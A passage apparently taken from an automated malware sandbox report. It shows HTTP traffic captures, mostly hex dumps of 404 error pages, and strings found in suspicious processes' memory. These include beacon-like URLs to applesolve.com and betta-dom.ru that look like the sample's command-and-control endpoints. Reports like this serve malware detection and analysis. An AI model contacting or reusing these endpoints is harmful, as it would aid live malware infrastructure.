20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 
6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0x-runtime: 0.045185content-length: 18187connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0x-runtime: 0.029447content-length: 18207connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097x-runtime: 0.025147content-length: 28287connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 
3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:26:11 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 May 2024 06:26:14 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.3.6 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 02 May 2024 06:26:36 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.3.6 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 02 May 2024 06:26:38 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.3.6 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 02 May 2024 06:26:41 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | content-length: 93 | cache-control: no-cache | content-type: text/html | connection: close | Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 02 May 2024 06:27:57 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 02 May 2024 06:28:01 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 02 May 2024 06:28:04 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000036F6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
